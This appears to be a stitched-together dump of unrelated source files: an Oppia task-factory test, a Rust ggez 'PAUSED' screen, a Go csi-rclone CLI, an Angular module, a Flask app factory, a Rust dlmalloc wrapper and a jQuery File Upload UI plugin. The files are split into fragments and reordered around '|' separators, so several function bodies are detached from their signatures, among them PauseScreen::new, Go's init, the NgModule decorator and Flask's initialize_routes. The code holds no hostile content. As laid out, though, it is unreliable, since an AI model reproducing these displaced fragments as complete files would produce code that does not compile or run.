expect(task.taskType).toEqual('needs_guiding_responses');
expect(task.targetType).toEqual('state');
expect(task.targetId).toEqual('Introduction');
expect(task.getIssueDescription()).toEqual(
'3 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
expect(task.isOpen()).toBeTrue();
});
it('should throw when backend dict entity type is not exploration', () => {
expect(
() => needsGuidingResponsesTaskObjectFactory.createFromBackendDict({
entity_type: '???',
entity_id: 'eid',
entity_version: 1,
task_type: 'needs_guiding_responses',
target_type: 'state',
target_id: 'Introduction',
issue_description: (
'3 of the top 10 answers for this card did not have explicit ' +
'feedback from Oppia.'),
status: 'open',
resolver_username: null,
resolver_profile_picture_data_url: null,
resolved_on_msecs: null,
})
).toThrowError(
'backend dict has entity_type "???" but expected "exploration"');
});
it('should throw when backend dict task type is not NGR', () => {
expect(
() => needsGuidingResponsesTaskObjectFactory.createFromBackendDict({
entity_type: 'exploration',
entity_id: 'eid',
entity_version: 1,
task_type: '???',
target_type: 'state',
target_id: 'Introduction',
issue_description: (
'3 of the top 10 answers for this card did not have explicit ' +
'feedback from Oppia.'),
status: 'open',
resolver_username: null,
resolver_profile_picture_data_url: null,
resolved_on_msecs: null,
})
).toThrowError(
'backend dict has task_type "???" but expected "needs_guiding_responses"'
);
});
it('should throw when backend dict target type is not state', () => {
expect(
() => needsGuidingResponsesTaskObjectFactory.createFromBackendDict({
entity_type: 'exploration',
entity_id: 'eid',
entity_version: 1,
task_type: 'needs_guiding_responses',
target_type: '???',
target_id: 'Introduction',
issue_description: (
'3 of the top 10 answers for this card did not have explicit ' +
'feedback from Oppia.'),
status: 'open',
|
resolver_username: null,
resolver_profile_picture_data_url: null,
resolved_on_msecs: null,
})
).toThrowError('backend dict has target_type "???" but expected "state"');
});
it('should update status based on changes to exploration stats', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromAnswerStats(
'eid', 1, 'Introduction', this.newTop10AnswerStats(3));
expect(task.isOpen()).toBeTrue();
expect(task.isResolved()).toBeFalse();
task.refreshStatus(this.newTop10AnswerStats(0));
expect(task.isOpen()).toBeFalse();
expect(task.isResolved()).toBeTrue();
task.refreshStatus(this.newTop10AnswerStats(7));
expect(task.isOpen()).toBeTrue();
expect(task.isResolved()).toBeFalse();
});
it('should not change issue description after it is generated', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromAnswerStats(
'eid', 1, 'Introduction', this.newTop10AnswerStats(0));
expect(task.getIssueDescription()).toBeNull();
task.refreshStatus(this.newTop10AnswerStats(7));
expect(task.getIssueDescription()).toEqual(
'7 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
task.refreshStatus(this.newTop10AnswerStats(0));
expect(task.getIssueDescription()).toEqual(
'7 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
task.refreshStatus(this.newTop10AnswerStats(3));
expect(task.getIssueDescription()).toEqual(
'7 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
});
});
| |
pause_screen.rs
|
use ggez::
{
Context,
GameResult,
graphics::Mesh,
};
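/// Holds one pre-built mesh per letter of the word "PAUSED".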
pub struct PauseScreen
{
p: Mesh,
a: Mesh,
u: Mesh,
s: Mesh,
e: Mesh,
d: Mesh,
}
impl PauseScreen
{
pub fn new(ctx: &mut Context) -> GameResult<PauseScreen>
|
pub fn draw(&self, ctx: &mut Context, scale: f32, offset: [f32; 2])
-> GameResult
{
use ggez::graphics::
{
DrawParam,
draw,
};
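        // Anchor the first glyph so that the six-cell word sits roughly
        // centered horizontally, about a quarter of the way down the board.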
let start = [
(1.0 + (super::BOARD_DIMENSIONS[0] / 2) as f32 - 2.5) * scale,
(1.0 + (super::BOARD_DIMENSIONS[1] / 4) as f32) * scale,
];
draw(ctx, &self.p, DrawParam::default()
.dest([
offset[0] + start[0],
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.a, DrawParam::default()
.dest([
offset[0] + start[0] + 1.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.u, DrawParam::default()
.dest([
offset[0] + start[0] + 2.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.s, DrawParam::default()
.dest([
offset[0] + start[0] + 3.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.e, DrawParam::default()
.dest([
offset[0] + start[0] + 4.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.d, DrawParam::default()
.dest([
offset[0] + start[0] + 5.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
Ok(())
}
}
|
{
use ggez::graphics::
{
Rect,
DrawMode,
MeshBuilder,
};
let eighth = 1.0 / 8.0;
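        // Each letter is drawn as filled rectangles laid out on an 8x8 unit
        // grid; `eighth` is the size of one grid cell.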
let p = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth,
eighth * 5.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth * 2.0,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth * 2.0,
eighth * 2.0,
eighth * 2.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 4.0,
eighth * 3.0,
eighth),
(255, 255, 255).into())
.build(ctx)?; // }
let a = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 2.0,
eighth,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth * 2.0,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 4.0,
eighth * 2.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth * 2.0,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.build(ctx)?; // }
let u = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 2.0,
eighth * 6.0,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.build(ctx)?; // }
let s = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 2.0,
eighth,
eighth * 5.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth * 2.0,
eighth * 2.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 2.0,
eighth * 3.0,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth * 4.0,
eighth * 2.0,
eighth * 2.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth * 6.0,
eighth * 5.0,
eighth),
(255, 255, 255).into())
.build(ctx)?; // }
let e = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth,
eighth * 2.0,
eighth * 6.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 3.0,
eighth * 3.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 6.0,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.build(ctx)?; // }
let d = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth,
eighth * 2.0,
eighth * 6.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth,
eighth * 3.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth * 2.0,
eighth * 2.0,
eighth * 4.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 6.0,
eighth * 3.0,
eighth),
(255, 255, 255).into())
.build(ctx)?; // }
Ok(PauseScreen
{
            p,
            a,
            u,
            s,
            e,
            d,
})
}
|
main.go
|
package main
import (
"flag"
"fmt"
"os"
"github.com/spf13/cobra"
"github.com/diseq/csi-rclone/pkg/rclone"
)
var (
endpoint string
nodeID string
)
func init()
|
func main() {
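	// Parsing an empty argument list marks the global flag set as parsed,
	// a common workaround for glog-style "logging before flag.Parse"
	// warnings (assumed to be its purpose here).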
flag.CommandLine.Parse([]string{})
cmd := &cobra.Command{
Use: "rclone",
Short: "CSI based rclone driver",
Run: func(cmd *cobra.Command, args []string) {
handle()
},
}
cmd.Flags().AddGoFlagSet(flag.CommandLine)
cmd.PersistentFlags().StringVar(&nodeID, "nodeid", "", "node id")
cmd.MarkPersistentFlagRequired("nodeid")
cmd.PersistentFlags().StringVar(&endpoint, "endpoint", "", "CSI endpoint")
cmd.MarkPersistentFlagRequired("endpoint")
versionCmd := &cobra.Command{
Use: "version",
Short: "Prints information about this version of csi rclone plugin",
Run: func(cmd *cobra.Command, args []string) {
fmt.Printf(`csi-rclone plugin
Version: %s
`, rclone.DriverVersion)
},
}
cmd.AddCommand(versionCmd)
versionCmd.ResetFlags()
cmd.ParseFlags(os.Args[1:])
if err := cmd.Execute(); err != nil {
fmt.Fprintf(os.Stderr, "%s", err.Error())
os.Exit(1)
}
os.Exit(0)
}
func handle() {
d := rclone.NewDriver(nodeID, endpoint)
d.Run()
}
|
{
flag.Set("logtostderr", "true")
}
|
app.module.ts
|
import {BrowserModule} from '@angular/platform-browser';
import {NgModule} from '@angular/core';
import {FormsModule} from '@angular/forms';
import {BrowserAnimationsModule} from '@angular/platform-browser/animations';
import {TranslateModule, TranslateService} from '@ngx-translate/core';
import {JigsawModule} from '@rdkmaster/jigsaw';
import {AppComponent} from './app.component';
@NgModule({
declarations: [
AppComponent
],
imports: [
BrowserModule, FormsModule, BrowserAnimationsModule,
JigsawModule, TranslateModule.forRoot()
],
providers: [TranslateService],
bootstrap: [AppComponent],
entryComponents: []
|
export class AppModule {
constructor(translateService: TranslateService) {
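        // Register the demo's zh/en translations and follow the browser's
        // reported language.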
translateService.setTranslation('zh', {
'get-started': '马上开始',
'give-star': '给 Jigsaw 点个星星'
});
translateService.setTranslation('en', {
'get-started': 'Get started',
'give-star': 'Give us a star on Github.com'
});
const lang: string = translateService.getBrowserLang();
translateService.setDefaultLang(lang);
translateService.use(lang);
}
}
|
})
|
__init__.py
|
import os
import resources_portal.models # noqa
from flask import Flask
from flask_migrate import Migrate
from flask_restful import Api
from resources_portal.db import db
from resources_portal.views import user
migrate = Migrate()
def initialize_routes(api: Api):
|
def set_database_URI(app: Flask):
database_URI_template = "postgresql://{DB_USER}:{DB_PASSWORD}@{DB_HOST}:{DB_PORT}/{DB_NAME}"
app.config["SQLALCHEMY_DATABASE_URI"] = database_URI_template.format(
DB_USER=app.config["DB_USER"],
DB_PASSWORD=app.config["DB_PASSWORD"],
DB_HOST=os.environ["DB_HOST"],
DB_PORT=app.config["DB_PORT"],
DB_NAME=app.config["DB_NAME"],
)
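# For example, DB_USER="postgres", DB_HOST="localhost", DB_PORT="5432" and
# DB_NAME="resources_portal" would yield
# "postgresql://postgres:<password>@localhost:5432/resources_portal"
# (illustrative values only).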
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__)
app.config.from_envvar("RESOURCES_PORTAL_CONFIG_FILE")
set_database_URI(app)
api = Api(app)
initialize_routes(api)
# ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
db.init_app(app)
migrate.init_app(app, db)
from resources_portal.schemas import ma
ma.init_app(app)
return app
|
api.add_resource(user.UsersApi, "/users")
api.add_resource(user.UserApi, "/users/<user_id>")
|
lib.rs
|
//! A Rust port of the `dlmalloc` allocator.
//!
//! The `dlmalloc` allocator is described at
//! http://g.oswego.edu/dl/html/malloc.html and this Rust crate is a straight
//! port of the C code for the allocator into Rust. The implementation is
//! wrapped up in a `Dlmalloc` type and has support for Linux, OSX, and Wasm
//! currently.
//!
//! The primary purpose of this crate is that it serves as the default memory
//! allocator for the `wasm32-unknown-unknown` target in the standard library.
//! Support for other platforms is largely untested and unused, but is used when
//! testing this crate.
#![cfg_attr(feature = "allocator-api", feature(allocator_api))]
#![cfg_attr(target_env = "sgx", feature(asm))]
|
#[cfg(feature = "allocator-api")]
use core::alloc::{Alloc, AllocErr, Layout};
use core::cmp;
use core::ptr;
#[cfg(all(feature = "global", not(test)))]
pub use self::global::GlobalDlmalloc;
mod dlmalloc;
#[cfg(all(feature = "global", not(test)))]
mod global;
/// An allocator instance
///
/// Instances of this type are used to allocate blocks of memory. For best
/// results only use one of these. Currently doesn't implement `Drop` to release
/// lingering memory back to the OS. That may happen eventually though!
pub struct Dlmalloc(dlmalloc::Dlmalloc);
/// Constant initializer for `Dlmalloc` structure.
pub const DLMALLOC_INIT: Dlmalloc = Dlmalloc(dlmalloc::DLMALLOC_INIT);
#[cfg(target_os = "xous")]
#[path = "xous.rs"]
mod sys;
#[cfg(target_arch = "wasm32")]
#[path = "wasm.rs"]
mod sys;
#[cfg(target_os = "macos")]
#[path = "macos.rs"]
mod sys;
#[cfg(target_os = "linux")]
#[path = "linux.rs"]
mod sys;
#[cfg(target_env = "sgx")]
#[path = "sgx.rs"]
mod sys;
impl Dlmalloc {
/// Creates a new instance of an allocator, same as `DLMALLOC_INIT`.
pub fn new() -> Dlmalloc {
DLMALLOC_INIT
}
    /// Allocates `size` bytes with alignment `align`.
///
/// Returns a null pointer if allocation fails. Returns a valid pointer
/// otherwise.
///
/// Safety and contracts are largely governed by the `GlobalAlloc::alloc`
/// method contracts.
#[inline]
pub unsafe fn malloc(&mut self, size: usize, align: usize) -> *mut u8 {
if align <= self.0.malloc_alignment() {
self.0.malloc(size)
} else {
self.0.memalign(align, size)
}
}
/// Same as `malloc`, except if the allocation succeeds it's guaranteed to
/// point to `size` bytes of zeros.
#[inline]
pub unsafe fn calloc(&mut self, size: usize, align: usize) -> *mut u8 {
let ptr = self.malloc(size, align);
if !ptr.is_null() && self.0.calloc_must_clear(ptr) {
ptr::write_bytes(ptr, 0, size);
}
ptr
}
/// Deallocates a `ptr` with `size` and `align` as the previous request used
/// to allocate it.
///
/// Safety and contracts are largely governed by the `GlobalAlloc::dealloc`
/// method contracts.
#[inline]
pub unsafe fn free(&mut self, ptr: *mut u8, size: usize, align: usize) {
drop((size, align));
self.0.free(ptr)
}
/// Reallocates `ptr`, a previous allocation with `old_size` and
/// `old_align`, to have `new_size` and the same alignment as before.
///
/// Returns a null pointer if the memory couldn't be reallocated, but `ptr`
/// is still valid. Returns a valid pointer and frees `ptr` if the request
/// is satisfied.
///
/// Safety and contracts are largely governed by the `GlobalAlloc::realloc`
/// method contracts.
#[inline]
pub unsafe fn realloc(
&mut self,
ptr: *mut u8,
old_size: usize,
old_align: usize,
new_size: usize,
) -> *mut u8 {
if old_align <= self.0.malloc_alignment() {
self.0.realloc(ptr, new_size)
} else {
let res = self.malloc(new_size, old_align);
if !res.is_null() {
let size = cmp::min(old_size, new_size);
ptr::copy_nonoverlapping(ptr, res, size);
self.free(ptr, old_size, old_align);
}
res
}
}
}
#[cfg(feature = "allocator-api")]
unsafe impl Alloc for Dlmalloc {
#[inline]
unsafe fn alloc(&mut self, layout: Layout) -> Result<ptr::NonNull<u8>, AllocErr> {
let ptr = <Dlmalloc>::malloc(self, layout.size(), layout.align());
ptr::NonNull::new(ptr).ok_or(AllocErr)
}
#[inline]
unsafe fn dealloc(&mut self, ptr: ptr::NonNull<u8>, layout: Layout) {
<Dlmalloc>::free(self, ptr.as_ptr(), layout.size(), layout.align())
}
#[inline]
unsafe fn realloc(
&mut self,
ptr: ptr::NonNull<u8>,
layout: Layout,
new_size: usize,
) -> Result<ptr::NonNull<u8>, AllocErr> {
let ptr = <Dlmalloc>::realloc(self, ptr.as_ptr(), layout.size(), layout.align(), new_size);
ptr::NonNull::new(ptr).ok_or(AllocErr)
}
#[inline]
unsafe fn alloc_zeroed(&mut self, layout: Layout) -> Result<ptr::NonNull<u8>, AllocErr> {
let ptr = <Dlmalloc>::calloc(self, layout.size(), layout.align());
ptr::NonNull::new(ptr).ok_or(AllocErr)
}
}
|
#![cfg_attr(not(feature = "allocator-api"), allow(dead_code))]
#![no_std]
#![deny(missing_docs)]
|
jquery.fileupload-ui.js
|
/*
* jQuery File Upload User Interface Plugin
* https://github.com/blueimp/jQuery-File-Upload
*
* Copyright 2010, Sebastian Tschan
* https://blueimp.net
*
* Licensed under the MIT license:
* https://opensource.org/licenses/MIT
*/
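// A minimal initialization sketch (hypothetical markup; assumes the page
// provides the upload/download templates and a ".files" container):
//
//   $('#fileupload').yafFileUpload({
//     autoUpload: true,
//     dataType: 'json'
//   });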
/* global define, require */
(function (factory) {
'use strict';
if (typeof define === 'function' && define.amd) {
// Register as an anonymous AMD module:
define([
'jquery',
'blueimp-tmpl',
'./jquery.fileupload-image',
'./jquery.fileupload-audio',
'./jquery.fileupload-video',
'./jquery.fileupload-validate'
], factory);
} else if (typeof exports === 'object') {
// Node/CommonJS:
factory(
require('jquery'),
require('blueimp-tmpl'),
require('./jquery.fileupload-image'),
require('./jquery.fileupload-audio'),
require('./jquery.fileupload-video'),
require('./jquery.fileupload-validate')
);
} else {
// Browser globals:
factory(window.jQuery, window.tmpl);
}
})(function ($, tmpl) {
'use strict';
$.blueimp.yafFileUpload.prototype._specialOptions.push(
'filesContainer',
'uploadTemplateId',
'downloadTemplateId'
);
// The UI version extends the file upload widget
// and adds complete user interface interaction:
$.widget('blueimp.yafFileUpload', $.blueimp.yafFileUpload, {
options: {
// By default, files added to the widget are uploaded as soon
// as the user clicks on the start buttons. To enable automatic
// uploads, set the following option to true:
autoUpload: false,
// The class to show/hide UI elements:
showElementClass: 'in',
// The ID of the upload template:
uploadTemplateId: 'template-upload',
// The ID of the download template:
downloadTemplateId: 'template-download',
// The container for the list of files. If undefined, it is set to
// an element with class "files" inside of the widget element:
filesContainer: undefined,
// By default, files are appended to the files container.
// Set the following option to true, to prepend files instead:
prependFiles: false,
// The expected data type of the upload response, sets the dataType
// option of the $.ajax upload requests:
dataType: 'json',
// Error and info messages:
messages: {
unknownError: 'Unknown error'
},
// Function returning the current number of files,
// used by the maxNumberOfFiles validation:
getNumberOfFiles: function () {
return this.filesContainer.children().not('.processing').length;
},
// Callback to retrieve the list of files from the server response:
getFilesFromResponse: function (data) {
if (data.result && $.isArray(data.result.files)) {
return data.result.files;
}
return [];
},
// The add callback is invoked as soon as files are added to the fileupload
// widget (via file input selection, drag & drop or add API call).
// See the basic file upload widget for more information:
add: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var $this = $(this),
that = $this.data('blueimp-yafFileUpload') || $this.data('fileupload'),
options = that.options;
data.context = that
._renderUpload(data.files)
.data('data', data)
.addClass('processing');
options.filesContainer[options.prependFiles ? 'prepend' : 'append'](
data.context
);
that._forceReflow(data.context);
that._transition(data.context);
data
.process(function () {
return $this.yafFileUpload('process', data);
})
.always(function () {
data.context
.each(function (index) {
$(this)
.find('.size')
.text(that._formatFileSize(data.files[index].size));
})
.removeClass('processing');
that._renderPreviews(data);
})
.done(function () {
data.context.find('.edit,.start').prop('disabled', false);
if (
that._trigger('added', e, data) !== false &&
(options.autoUpload || data.autoUpload) &&
data.autoUpload !== false
) {
data.submit();
}
})
.fail(function () {
if (data.files.error) {
data.context.each(function (index) {
var error = data.files[index].error;
if (error) {
$(this).find('.error').text(error);
}
});
}
});
},
// Callback for the start of each file upload request:
send: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload');
if (
data.context &&
data.dataType &&
data.dataType.substr(0, 6) === 'iframe'
) {
// Iframe Transport does not support progress events.
// In lack of an indeterminate progress bar, we set
// the progress to 100%, showing the full animated bar:
data.context
.find('.progress')
.addClass(!$.support.transition && 'progress-animated')
.attr('aria-valuenow', 100)
.children()
.first()
.css('width', '100%');
}
return that._trigger('sent', e, data);
},
// Callback for successful uploads:
done: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload'),
getFilesFromResponse =
data.getFilesFromResponse || that.options.getFilesFromResponse,
files = getFilesFromResponse(data),
template,
deferred;
if (data.context) {
data.context.each(function (index) {
var file = files[index] || { error: 'Empty file upload result' };
deferred = that._addFinishedDeferreds();
that._transition($(this)).done(function () {
var node = $(this);
template = that._renderDownload([file]).replaceAll(node);
that._forceReflow(template);
that._transition(template).done(function () {
data.context = $(this);
that._trigger('completed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
});
});
} else {
template = that
._renderDownload(files)
[that.options.prependFiles ? 'prependTo' : 'appendTo'](
that.options.filesContainer
);
that._forceReflow(template);
deferred = that._addFinishedDeferreds();
that._transition(template).done(function () {
data.context = $(this);
that._trigger('completed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
}
},
// Callback for failed (abort or error) uploads:
fail: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload'),
template,
deferred;
if (data.context) {
data.context.each(function (index) {
if (data.errorThrown !== 'abort') {
var file = data.files[index];
file.error =
file.error || data.errorThrown || data.i18n('unknownError');
deferred = that._addFinishedDeferreds();
that._transition($(this)).done(function () {
var node = $(this);
template = that._renderDownload([file]).replaceAll(node);
that._forceReflow(template);
that._transition(template).done(function () {
data.context = $(this);
that._trigger('failed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
});
} else {
deferred = that._addFinishedDeferreds();
that._transition($(this)).done(function () {
$(this).remove();
that._trigger('failed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
}
});
} else if (data.errorThrown !== 'abort') {
data.context = that
._renderUpload(data.files)
[that.options.prependFiles ? 'prependTo' : 'appendTo'](
that.options.filesContainer
)
.data('data', data);
that._forceReflow(data.context);
deferred = that._addFinishedDeferreds();
that._transition(data.context).done(function () {
data.context = $(this);
that._trigger('failed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
} else {
that._trigger('failed', e, data);
that._trigger('finished', e, data);
that._addFinishedDeferreds().resolve();
}
},
// Callback for upload progress events:
progress: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var progress = Math.floor((data.loaded / data.total) * 100);
if (data.context) {
data.context.each(function () {
$(this)
.find('.progress')
|
.first()
.css('width', progress + '%');
});
}
},
// Callback for global upload progress events:
progressall: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var $this = $(this),
progress = Math.floor((data.loaded / data.total) * 100),
globalProgressNode = $this.find('.fileupload-progress'),
extendedProgressNode = globalProgressNode.find('.progress-extended');
if (extendedProgressNode.length) {
extendedProgressNode.html(
(
$this.data('blueimp-yafFileUpload') || $this.data('fileupload')
)._renderExtendedProgress(data)
);
}
globalProgressNode
.find('.progress')
.attr('aria-valuenow', progress)
.children()
.first()
.css('width', progress + '%');
},
// Callback for uploads start, equivalent to the global ajaxStart event:
start: function (e) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload');
that._resetFinishedDeferreds();
that
._transition($(this).find('.fileupload-progress'))
.done(function () {
that._trigger('started', e);
});
},
// Callback for uploads stop, equivalent to the global ajaxStop event:
stop: function (e) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload'),
deferred = that._addFinishedDeferreds();
$.when.apply($, that._getFinishedDeferreds()).done(function () {
that._trigger('stopped', e);
});
that
._transition($(this).find('.fileupload-progress'))
.done(function () {
$(this)
.find('.progress')
.attr('aria-valuenow', '0')
.children()
.first()
.css('width', '0%');
$(this).find('.progress-extended').html(' ');
deferred.resolve();
});
},
processstart: function (e) {
if (e.isDefaultPrevented()) {
return false;
}
$(this).addClass('fileupload-processing');
},
processstop: function (e) {
if (e.isDefaultPrevented()) {
return false;
}
$(this).removeClass('fileupload-processing');
},
// Callback for file deletion:
destroy: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload'),
removeNode = function () {
that._transition(data.context).done(function () {
$(this).remove();
that._trigger('destroyed', e, data);
});
};
if (data.url) {
data.dataType = data.dataType || that.options.dataType;
$.ajax(data)
.done(removeNode)
.fail(function () {
that._trigger('destroyfailed', e, data);
});
} else {
removeNode();
}
}
},
_resetFinishedDeferreds: function () {
this._finishedUploads = [];
},
_addFinishedDeferreds: function (deferred) {
// eslint-disable-next-line new-cap
var promise = deferred || $.Deferred();
this._finishedUploads.push(promise);
return promise;
},
_getFinishedDeferreds: function () {
return this._finishedUploads;
},
    // Link handler that allows files to be downloaded
    // by dragging the links to the desktop:
_enableDragToDesktop: function () {
var link = $(this),
url = link.prop('href'),
name = link.prop('download'),
type = 'application/octet-stream';
link.on('dragstart', function (e) {
try {
e.originalEvent.dataTransfer.setData(
'DownloadURL',
[type, name, url].join(':')
);
} catch (ignore) {
// Ignore exceptions
}
});
},
_formatFileSize: function (bytes) {
if (typeof bytes !== 'number') {
return '';
}
if (bytes >= 1000000000) {
return (bytes / 1000000000).toFixed(2) + ' GB';
}
if (bytes >= 1000000) {
return (bytes / 1000000).toFixed(2) + ' MB';
}
return (bytes / 1000).toFixed(2) + ' KB';
},
_formatBitrate: function (bits) {
if (typeof bits !== 'number') {
return '';
}
if (bits >= 1000000000) {
return (bits / 1000000000).toFixed(2) + ' Gbit/s';
}
if (bits >= 1000000) {
return (bits / 1000000).toFixed(2) + ' Mbit/s';
}
if (bits >= 1000) {
return (bits / 1000).toFixed(2) + ' kbit/s';
}
return bits.toFixed(2) + ' bit/s';
},
_formatTime: function (seconds) {
var date = new Date(seconds * 1000),
days = Math.floor(seconds / 86400);
days = days ? days + 'd ' : '';
return (
days +
('0' + date.getUTCHours()).slice(-2) +
':' +
('0' + date.getUTCMinutes()).slice(-2) +
':' +
('0' + date.getUTCSeconds()).slice(-2)
);
},
_formatPercentage: function (floatValue) {
return (floatValue * 100).toFixed(2) + ' %';
},
_renderExtendedProgress: function (data) {
return (
this._formatBitrate(data.bitrate) +
' | ' +
this._formatTime(((data.total - data.loaded) * 8) / data.bitrate) +
' | ' +
this._formatPercentage(data.loaded / data.total) +
' | ' +
this._formatFileSize(data.loaded) +
' / ' +
this._formatFileSize(data.total)
);
},
_renderTemplate: function (func, files) {
if (!func) {
return $();
}
var result = func({
files: files,
formatFileSize: this._formatFileSize,
options: this.options
});
if (result instanceof $) {
return result;
}
return $(this.options.templatesContainer).html(result).children();
},
_renderPreviews: function (data) {
data.context.find('.preview').each(function (index, elm) {
$(elm).empty().append(data.files[index].preview);
});
},
_renderUpload: function (files) {
return this._renderTemplate(this.options.uploadTemplate, files);
},
_renderDownload: function (files) {
return this._renderTemplate(this.options.downloadTemplate, files)
.find('a[download]')
.each(this._enableDragToDesktop)
.end();
},
_editHandler: function (e) {
e.preventDefault();
if (!this.options.edit) return;
var that = this,
button = $(e.currentTarget),
template = button.closest('.template-upload'),
data = template.data('data'),
index = button.data().index;
this.options.edit(data.files[index]).then(function (file) {
if (!file) return;
data.files[index] = file;
data.context.addClass('processing');
template.find('.edit,.start').prop('disabled', true);
$(that.element)
.yafFileUpload('process', data)
.always(function () {
template
.find('.size')
.text(that._formatFileSize(data.files[index].size));
data.context.removeClass('processing');
that._renderPreviews(data);
})
.done(function () {
template.find('.edit,.start').prop('disabled', false);
})
.fail(function () {
template.find('.edit').prop('disabled', false);
var error = data.files[index].error;
if (error) {
template.find('.error').text(error);
}
});
});
},
_startHandler: function (e) {
e.preventDefault();
var button = $(e.currentTarget),
template = button.closest('.template-upload'),
data = template.data('data');
button.prop('disabled', true);
if (data && data.submit) {
data.submit();
}
},
_cancelHandler: function (e) {
e.preventDefault();
var template = $(e.currentTarget).closest(
'.template-upload,.template-download'
),
data = template.data('data') || {};
data.context = data.context || template;
if (data.abort) {
data.abort();
} else {
data.errorThrown = 'abort';
this._trigger('fail', e, data);
}
},
_deleteHandler: function (e) {
e.preventDefault();
var button = $(e.currentTarget);
this._trigger(
'destroy',
e,
$.extend(
{
context: button.closest('.template-download'),
type: 'DELETE'
},
button.data()
)
);
},
_forceReflow: function (node) {
return $.support.transition && node.length && node[0].offsetWidth;
},
_transition: function (node) {
// eslint-disable-next-line new-cap
var dfd = $.Deferred();
if (
$.support.transition &&
node.hasClass('fade') &&
node.is(':visible')
) {
var transitionEndHandler = function (e) {
// Make sure we don't respond to other transition events
// in the container element, e.g. from button elements:
if (e.target === node[0]) {
node.off($.support.transition.end, transitionEndHandler);
dfd.resolveWith(node);
}
};
node
.on($.support.transition.end, transitionEndHandler)
.toggleClass(this.options.showElementClass);
} else {
node.toggleClass(this.options.showElementClass);
dfd.resolveWith(node);
}
return dfd;
},
_initButtonBarEventHandlers: function () {
var fileUploadButtonBar = this.element.find('.fileupload-buttonbar'),
filesList = this.options.filesContainer;
this._on(fileUploadButtonBar.find('.start'), {
click: function (e) {
e.preventDefault();
filesList.find('.start').click();
}
});
this._on(fileUploadButtonBar.find('.cancel'), {
click: function (e) {
e.preventDefault();
filesList.find('.cancel').click();
}
});
